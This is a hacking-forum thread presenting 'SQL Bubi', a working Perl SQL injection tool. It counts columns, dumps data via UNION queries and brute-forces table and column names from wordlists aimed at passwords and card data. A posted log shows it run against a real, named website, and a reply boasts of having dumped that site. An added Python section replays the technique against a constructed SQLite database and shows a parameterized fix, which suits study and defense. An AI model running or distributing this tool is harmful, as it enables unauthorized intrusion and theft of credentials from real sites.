
Topic: SQL Bubi 1.0

  1. #1

    SQL Bubi 1.0

    I'm making a somewhat older project of mine available here. Since various SQL injection helpers didn't run particularly well for me, never mind on Linux, I wrote something of my own for it.

    It's nothing special, just helpful and not as fucked up as schemafuzz.
    The functions can be seen in the comments.

    Bubi is written in Perl
    Total lines -> um, 310
    On request I'll build in proxy and thread support as well

    Logfiles are generated automatically and should contain all the important information. I'm open to criticism and code improvements

    Logfile example:

    Code:
    +-------------------------------------------------------------+
    |    j0k3 SQL Injection Helper - Logfile                      |
    +-------------------------------------------------------------+
    
    Columns:8
    String: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,8--+
    
    +-------------------------------------------------------------+
    |    j0k3 SQL Injection Helper - Logfile                      |
    +-------------------------------------------------------------+
    
    Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,j0k3
    
    User: leeger_zuckerm@localhost
    MySQL Version: 5.0.90-community
    Directory: /var/lib/mysql/
    
    +-------------------------------------------------------------+
    |    j0k3 SQL Injection Helper - Logfile                      |
    +-------------------------------------------------------------+
    
    Url: http://zuckermais.ch/index.php?id=18+AND+1=0+UNION+SELECT+1,2,3,4,5,6,7,UNHEX(HEX(CONCAT_WS(0x3a,99999,table_name,column_name,99999)))+from+information_schema.columns
    
    Dumping Information:
    
    [0] CHARACTER_SETS:CHARACTER_SET_NAME
    [1] CHARACTER_SETS:DEFAULT_COLLATE_NAME
    [2] CHARACTER_SETS:DESCRIPTION
    [3] CHARACTER_SETS:MAXLEN
    [4] COLLATIONS:COLLATION_NAME
    [5] COLLATIONS:CHARACTER_SET_NAME
    [6] COLLATIONS:ID
    [7] COLLATIONS:IS_DEFAULT
    [8] COLLATIONS:IS_COMPILED
    [9] COLLATIONS:SORTLEN
    [10] COLLATION_CHARACTER_SET_APPLICABILITY:COLLATION_NAME
    [11] COLLATION_CHARACTER_SET_APPLICABILITY:CHARACTER_SET_NAME
    [12] COLUMNS:TABLE_CATALOG
    [13] COLUMNS:TABLE_SCHEMA
    [14] COLUMNS:TABLE_NAME
    
    +-------------------------------------------------------------+
    |    j0k3 SQL Injection Helper - Logfile                      |
    +-------------------------------------------------------------+
    
    Url: http://zuckermais.ch/index.php?id=18+and+1=0+union+select+1,2,3,4,5,6,7,j0k3
    
    Scanning Tables:
    + information_schema.columns -> Scanning Columns:
    - table_name
    - column_name
    Script:

    Code:
    #!/usr/bin/perl
    #-------------------------------------------------------------------#
    #    _  ___  _    ____  
    #   (_)/ _ \| |  |___ \ 
    #    _| | | | | __ __) |
    #   | | | | | |/ /|__ < 
    #   | | |_| |   < ___) |
    #   | |\___/|_|\_\____/
    #  _/ |                 
    # |__/  SQL Injection Helper 1.0 
    #
    #................................................................
    #
    #    + written by fred777
    #    + (C) 2010 by j0k3 project
    #    + fred777.5x.to
    #
    # ...............................................................
    # DAMN INFORMATION SHIT
    #
    # + Column Counter
    # + SQL Data Grabber
    # + Name Information Fuzzer
    #
    # - Column Counter
    # - $ perl sql.pl -c <page> <true-word>
    # - $ perl sql.pl -c http://seite.de/?d=1 j0k3
    #
    # - SQL Data Grabber
    # - $ perl sql.pl -d <page>
    # - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,j0k3
    # - $ perl sql.pl -d http://seite.de/?d=-1+union+select+1,
    #                    j0k3(table_name1,name2)+from+table
    #
    # - Name Information Fuzzer
    # - $ perl sql.pl -f <page>
    # - $ perl sql.pl -f http://seite.de/?d=-1+union+select+1,j0k3
    #
    # ...............................................................
    # DAMN GREETZ
    #
    # + back2hack, free-hack, creative-coding, scene-coderz, hackbase
    # + darkc0de for the n1 table list
    # + and teh leet happy ninjas of course :P
    #
    #-------------------------------------------------------------------#
    use strict;
    use warnings;
    use LWP::UserAgent;
    
    print q{
    +-------------------------------------------------------------+
    |                 SQL Injection Helper 1.0                    |
    |                                                             |
    |    + Column Counter                                         |
    |    + SQL Data Grabber                                       |
    |    + Name Information-Fuzzer                                |
    |                                                             |
    |                         < j0k3 >           (C) by fred777   |
    +-------------------------------------------------------------+
    }; $|++;          # unbuffered STDOUT so progress shows up at once
    
    # -c <url> <true-word> | -d <url> | -f <url>
    my ($op, $url, $true) = @ARGV;
    my ($file, $lim)      = ('log.txt', 1000);   # logfile, LIMIT window
    my $ua                = LWP::UserAgent->new();
    
    my $head =
    	"+-------------------------------------------------------------+\n".
    	"|    j0k3 SQL Injection Helper - Logfile                      |\n".
    	"+-------------------------------------------------------------+\n";
    
    usage() unless defined $op  && $op  =~ m{^-[dcf]$};
    usage() unless defined $url && $url =~ m{^http://};
    
    writing($head);
    
    order()   if $op eq '-c';
    selects() if $op eq '-d';
    fuzz()    if $op eq '-f';
    
    # GET wrapper. LWP always hands back a response object, so the old
    # "$ua->get(...) or die" could never fire; a failed connection shows up
    # as an internal response instead, which is what we die on here.
    sub fetch {
    	my $target = shift;
    	my $resp   = $ua->get($target);
    	die "\n" . $resp->status_line . "\n" if $resp->header('Client-Warning');
    	return $resp->content;
    }
    
    # -c: append ORDER BY n with growing n. The first n at which the true-word
    # disappears from the page is one past the column count.
    sub order {
    	error() unless $true;
    	my ($i, $str) = (0, "$url+AND+1=0+UNION+SELECT+1");
    
    	# 100 is a sanity cap so a page that ignores ORDER BY cannot loop forever
    	do {
    		$i++;
    	} while ($i < 100 && fetch("$url+ORDER+BY+$i--+") =~ m{\Q$true\E}i);
    
    	$str .= ",$_" for (2 .. $i-1);
    	printf("\nColumns: %d\nString: %s\n", $i-1, "$str--+");
    	writing("\nColumns:" . ($i-1) . "\nString: $str--+\n\n");
    }
    
    # -d: with a bare "j0k3" in the visible column, grab user()/version()/@@datadir;
    # with "j0k3(col1,col2)+from+table", walk that table row by row.
    # The 99999 markers around CONCAT_WS() make the value easy to cut out of
    # the HTML; UNHEX(HEX()) forces a plain string.
    sub selects {
    	if ($url =~ m{j0k3}i && $url !~ m{from}i) {
    		my $inf  = 'UNHEX(HEX(CONCAT_WS(0x3a,99999,user(),version(),@@datadir,99999)))';
    		my $st   = replace($url, 'j0k3', $inf);
    		my $html = fetch("$st--+");
    
    		my ($user, $ver, $dir) = $html =~ m{[9]{5}:(.+?):(.+?):(.+?):[9]{5}};
    		if (defined $user) {
    			my $t = "\nUrl: $url\n\nUser: $user\nMySQL Version: $ver\nDirectory: $dir\n\n";
    			print $t; writing($t);
    		} else {
    			print "\nMarker not found in the response - is j0k3 in a visible column?\n";
    		}
    	}
    	elsif ($url =~ m{from}i && $url =~ m{j0k3\((.+)\)}i) {
    		my $cols = $1;
    		my $str  = "UNHEX(HEX(CONCAT_WS(0x3a,99999,$cols,99999)))";
    		my $st   = replace($url, "j0k3($cols)", $str);
    		print "\nDumping Information:\n\n";
    		writing("\nUrl: $st\n\nDumping Information:\n\n");
    
    		# LIMIT $c,$lim: the page only renders the first row it gets back,
    		# so the offset $c is what walks the table, one row per request.
    		my $c = 0;
    		while (1) {
    			my $html  = fetch("$st+LIMIT+$c,$lim--+");
    			my ($val) = $html =~ m{[9]{5}:(.+):[9]{5}};
    			last if !defined $val || $html =~ m{error}i;
    			print "[$c] $val\n"; writing("[$c] $val\n");
    			$c++;
    		}
    	}
    	else {
    		error();
    	}
    }
    
    # -f: guess table names from the darkc0de list, then column names within
    # every table that answered, by checking whether the marker is rendered.
    sub fuzz {
    
    	my @tables =(
    	'user','admin','users','admins','account','accounts','adm','admin_login', 
    	'member','memberlist','members','login_admin','login_admins','login_user',
    	'login_users','logins','logon','logs','admin_user','admin_userinfo','administer',
    	'administrable','administrate','administration','administrator','administrators',
    	'adminrights','adminuser','login','mambo_session','mambo_users','manage','Logins',
    	'manager','mb_users','mybb_users','e107.e107_user','e107_user','Admins','Login',
    	'phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users',
    	'tbladmins','sort','_wfspro_admin','4images_users','a_admin','art','article_admin', 
    	'articles','artikel','aut','author','autore','backend','backend_users','backenduser', 
    	'chat_config','chat_messages','chat_users','client','clients','clubconfig',
    	'company','config','contact','contacts','content', 'control','cpg_config', 
    	'cpg132_users','customer','customers','customers_basket','dbadmins','dealer', 
    	'dealers','diary','download','forum.ibf_members','fusion_user_groups',
    	'fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings',
    	'ibf_members','ibf_members_converge','ibf_sessions','icq','images','index',
    	'info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users',
    	'jos_comprofiler_members','jos_contact_details','jos_joomblog_users',
    	'jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici',
    	'kpro_adminlogs','kpro_user','links','lost_pass','lost_passwords','movie','movies',
    	'lostpass','lostpasswords','m_admin','main','minibbtable_users','mitglieder',
    	'mysql','mysql.user','name','names','news','news_lostpass','newsletter', 
    	'nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users',
    	'obb_profiles','order','orders','parol','partner','partners','passes','password',
    	'passwords','perdorues','perdoruesit','phorum_session','phorum_user',
    	'phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user',
    	'punbb_users','pwd','pwds','reg_user','reg_users','registered','reguser','regusers', 
    	'session','sessions','settings','shop.cards','shop.orders','site_login', 
    	'site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members',
    	'SS_orders','statistics','superuser','sysadmin','sysadmins','system','sysuser', 
    	'sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member',
    	'tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user',
    	'tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test',
    	'usebb_members','user_admin','user_info','user_list','user_login','user_logins',
    	'user_names','usercontrol','userinfo','userlist','userlogins','username','usernames',
    	'userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members',
    	'webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin',
    	'xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ActiveDataFeed',
    	'Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1',
    	'DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties', 
    	'Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre', 
    	'JamPass','MyTicketek','MyTicketekArchive','News','Promotion','Region',
    	'SearchOptions','Series','Sheldonshows','StateList','States','SubCategory',
    	'Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent', 
    	'sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows',
    	'Ticket System Acc Numbers','TimeDiff','Titles','Total Members','UserPreferences',
    	'uvw_Category','uvw_Preferences','Venue','venues','VenuesNew','stone list',
    	'tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor',
    	'tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory',
    	'tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList', 
    	'viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info', 
    	'CC_username','cms_user','cms_users','cms_admin','cms_admins','user_name',
    	'jos_user','table_user','email','mail','bulletin','cc_info','login_name', 
    	'admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin', 
    	);
    	
    	my @columns = (
    	'user','name','username','password','passwd','pass','benutzername','passwort',
    	'cc_number','id','email','pwd','user_name','customers_email_address',
    	'customers_password','user_password','user_pass','admin_user','admin_password',
    	'admin_pass','usern','user_n','username1','password1','email1','id1',
    	'users','login','logins','login_user','login_admin','login_username','user_username', 
    	'user_login','auid','apwd','adminid','admin_id','adminuser','adminuserid',
    	'admin_userid','adminusername','admin_username','adminname','admin_name',
    	'usr','usr_n','usrname','usr_name','usrpass','usr_pass','usrnam','nc','uid',
    	'userid','user_id','myusername','mail','emni','logohu','punonjes','kpro_user',
    	'wp_users','emniplote','perdoruesi','perdorimi','punetoret','logini','llogaria', 
    	'kodi','emer','ime','korisnik','korisnici','user1','administrator','text',
    	'administrator_name','mem_login','login_password','login_pass','login_passwd',
    	'login_pwd','sifra','lozinka','psw','pass1word','pass_word','passw','pass_w',
    	'user_passwd','userpass','userpassword','userpwd','user_pwd','useradmin',
    	'user_admin','mypassword','passwrd','admin_pwd','admin_passwd','mem_password', 
    	'memlogin','e_mail','usrn','u_name','uname','mempassword','mem_pass', 
    	'mem_passwd','mem_pwd','p_word','pword','p_assword','myname','my_username',
    	'my_name','my_password','my_email','cvvnumber','about','access','accnt',
    	'accnts','account','accounts','admin','adminemail','adminlogin','adminmail',
    	'admins','aid','aim','auth','authenticate','authentication','blog','cc_expires',
    	'cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername',
    	'conf','config','contact','converge_pass_hash','converge_pass_salt','crack', 
    	'customer','customers','cvvnumber]','data','db_database_name','db_hostname', 
    	'db_password','db_username','download','e-mail','emailaddress','full','gid',
    	'group','group_name','hash','hashsalt','homepage','icq','icq_number','id_group',
    	'id_member','images','index','ip_address','last_ip','last_login','lastname',
    	'log','login_name','login_pw','loginkey','loginout','logo','md5hash','member', 
    	'member_id','member_login_key','member_name','memberid','membername','members',
    	'new','news','nick','number','nummer','pass_hash','passwordsalt','passwort', 
    	'personal_key','phone','privacy','pw','pwrd','salt','search','secretanswer',
    	'secretquestion','serial','session_member_id','session_member_login_key','sesskey', 
    	'setting','sid','spacer','status','store','store1','store2','store3','store4',
    	'table_prefix','temp_pass','temp_password','temppass','temppasword','text','un',
    	'user_email','user_icq','user_ip','user_level','user_passw','user_pw','user_pword',
    	'user_pwrd','user_un','user_uname','user_usernm','user_usernun','user_usrnm', 
    	'userip','userlogin','usernm','userpw','usr2','usrnm','usrs','warez','xar_name',
    	'xar_pass');
    	
    	print "\nUrl: $url\n";        writing("\nUrl: $url\n");
    	print "\nScanning Tables:\n"; writing("\nScanning Tables:\n");
    
    	foreach my $tab (@tables) {
    		# Selecting the bare marker FROM $tab only renders it if the table
    		# exists and has at least one row (empty tables are missed).
    		my $re   = replace($url, 'j0k3', 9 x 5);
    		my $html = fetch("$re+FROM+$tab--+");
    		next unless $html =~ m{[^,][9]{5}} && $html !~ m{error}i;
    
    		print "+ $tab -> Scanning Columns:\n";
    		writing("+ $tab -> Scanning Columns:\n");
    
    		foreach my $col (@columns) {
    			# CONCAT(99999,0x3a,$col) only renders when the column exists;
    			# "[^(]" skips the echoed payload if the page reflects the URL.
    			$re   = replace($url, 'j0k3', "CONCAT(99999,0x3a,$col)");
    			$html = fetch("$re+FROM+$tab+LIMIT+0,1--+");
    			if ($html =~ m{[^(][9]{5}} && $html !~ m{error}i) {
    				print "- $col\n"; writing("- $col\n");
    			}
    		}
    	}
    }
    
    # Plain-string substitution (first match only); the needle is quoted so
    # "j0k3(a,b)" is matched literally and not as a regex.
    sub replace {
    	my ($str, $or, $re) = @_;
    	$str =~ s/\Q$or\E/$re/;
    	return $str;
    }
    
    # Append to the logfile.
    sub writing {
    	my $text = shift;
    	open my $fh, '>>', $file or die "\n$file: $!\n";
    	print $fh $text;
    	close $fh;
    }
    
    sub error {
    	print "+-------------------------------------------------------------+\n".
    	      "|    Error:  Read Usage! - \$ perl sql.pl                      |\n".
    	      "+-------------------------------------------------------------+\n";
    	exit;
    }
    
    sub usage {
    	print q{
    +-------------------------------------------------------------+
    |   INFORMATION                                               |
    +-------------------------------------------------------------+
    |                                                             |
    |   Column Counter:                                           |
    |   $ perl sql.pl -c <url> <true-word>                        |
    |   $ perl sql.pl -c http://seite.de/?id=7 j0k3               |
    |                                                             |
    |   SQL Data Grabber:                                         |
    |   $ perl sql.pl -d <url>                                    |
    |   $ perl sql.pl -d http://seite.de/?id=-7+union+select      |
    |                    +1,j0k3                                  |
    |   $ perl sql.pl -d http://seite.de/?id=-7+union+select+1,   |
    |                    j0k3(column1,column2)+from+table         |
    |                                                             |
    |   Name Information Fuzzer:                                  |
    |   $ perl sql.pl -f <url>                                    |
    |   $ perl sql.pl -f http://seite.de/?id=-7+union+select      |
    |                    +1,j0k3                                  |
    |                                                             |
    |                        < j0k3 >                             |
    +-------------------------------------------------------------+
    }; exit;
    }
    # EOF - < j0k3 > - > 06.2010 - version 1.0
    Last edited by fred777 (13.06.2010 at 22:37)
    _n0p3_

  2. The following users thanked this post:

    moppelito (13.06.2010)
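Added example, not code from the post or from the j0k3 tool: the three tricks SQL Bubi automates (ORDER BY column counting, marker-wrapped UNION extraction with LIMIT paging, and table-name guessing) replayed in Python against a constructed SQLite-backed stand-in for the target page, so the mechanics can be watched offline. MySQL's CONCAT_WS(0x3a,99999,...,99999) and information_schema are swapped for SQLite's || and sqlite_master; the users/news tables, the true-word alice and the marker 99999 are all assumptions. A hardened_page variant binds ?id= as a parameter, which is the check a defender wants: all three probes come back empty against it.

```python
import re
import sqlite3

MARK = "99999"   # same marker the tool wraps around CONCAT_WS() output


def build_db():
    """Constructed sample database standing in for the target's MySQL."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER, name TEXT, pass TEXT);
        INSERT INTO users VALUES (1, 'alice', 's3cret'), (2, 'bob', 'hunter2');
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'hello', 'world');
    """)
    return db


def vulnerable_page(db, id_param):
    """Stand-in for index.php?id=...: the parameter is pasted into the SQL."""
    sql = "SELECT id, name, pass FROM users WHERE id=" + id_param
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as e:
        return f"<p>error: {e}</p>"      # the error page is what the tool keys on
    return "<p>" + " ".join(str(c) for c in (row or ())) + "</p>"


def hardened_page(db, id_param):
    """Same page with the value bound as a parameter: it is data, never SQL."""
    row = db.execute("SELECT id, name, pass FROM users WHERE id=?",
                     (id_param,)).fetchone()
    return "<p>" + " ".join(str(c) for c in (row or ())) + "</p>"


def count_columns(page, base, true_word, cap=32):
    """-c: raise ORDER BY n until the true-word vanishes; n-1 is the column count."""
    i = 1
    while i <= cap and true_word in page(f"{base} ORDER BY {i}--"):
        i += 1
    return i - 1


def grab(page, base_union, expr):
    """-d: wrap expr in MARK:...:MARK and cut it back out of the HTML.
    MySQL's CONCAT_WS(0x3a, 99999, expr, 99999) becomes || in SQLite."""
    payload = base_union.replace("j0k3", f"'{MARK}:'||{expr}||':{MARK}'")
    m = re.search(rf"{MARK}:(.*?):{MARK}", page(payload))
    return m.group(1) if m else None


def dump(page, base_union, expr, from_clause, max_rows=50):
    """-d with j0k3(cols)+from+table: one row per request via LIMIT offset,1."""
    rows = []
    for c in range(max_rows):
        row = grab(page, f"{base_union} {from_clause} LIMIT {c},1", expr)
        if row is None:
            break
        rows.append(row)
    return rows


def fuzz_tables(page, base_union, wordlist):
    """-f: a table name is confirmed when selecting the marker FROM it renders
    without an error string. Empty tables are missed, exactly as in the tool."""
    found = []
    for tab in wordlist:
        html = page(base_union.replace("j0k3", f"'{MARK}'") + f" FROM {tab}--")
        if MARK in html and "error" not in html.lower():
            found.append(tab)
    return found


if __name__ == "__main__":
    db = build_db()
    union = "-1 UNION SELECT 1,j0k3,3"
    for label, fn in (("vulnerable", vulnerable_page), ("hardened", hardened_page)):
        page = lambda q, _fn=fn: _fn(db, q)
        print(label, "columns:", count_columns(page, "1", "alice"))
        print(label, "version:", grab(page, union, "sqlite_version()"))
        print(label, "tables :", fuzz_tables(page, union, ["admin", "users", "news"]))
        print(label, "creds  :", dump(page, union, "name||':'||pass", "FROM users"))
```

Against vulnerable_page the counter stops at ORDER BY 4 (three columns), grab() pulls the engine version out of the marker, fuzz_tables() confirms users and news, and dump() pages out every name:pass pair. Against hardened_page the bound string never becomes SQL, so the true-word is gone at ORDER BY 1, no marker is ever rendered, and every list comes back empty; note that UNION (not UNION ALL) de-duplicates and so may reorder rows, which is why the dumped rows are compared as sets.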

  3. #2
    Stanley Jobson (joined 27.07.2008, 691 posts)

    Looks good (:
    Going to test it right away.
    I've already dumped Zuckermais.ch too ^^.


    I'm the one who will survive
    The ones you eat alive
    And nobody puts up a fight
    I'll do what I wanna do
    'Cause I wasn't built to lose..


  4. #3

    Yes, that was only for testing purposes.
    If the query needs a single quote, for example, that obviously has to be adjusted,
    or rather the word 'j0k3' has to be put into the visible field..
    _n0p3_

  5. #4
    0x30 (user title: print<>=~y/0-9//,$/; joined 01.02.2010, 468 posts)

    OT: What do you find so fucked up about schemafuzz?
    Code:
    $_=<>;map$-+=$_,/./g;print$-,$/
    +0x60

  6. #5

    pointlessly many helper statements
    confusing code, at least most of the time
    nested options, which also leads to all the conditions being handled in an overblown way..

    I'm no Python master, but the code was probably never particularly well thought out.
    If I were one, I'm sure I'd come up with even more..
    _n0p3_

  7. #6
    novaca!ne (user title: just call me n0va ^.^; joined 03.01.2009, 979 posts)

    spelling mistake:
    # + and teh leet happy ninjas of cause
    should actually be course
    .:B:.
    help in any area [except RAT support >.<]
    Quote from Starflow:
    Google can be used for more than just a homepage....
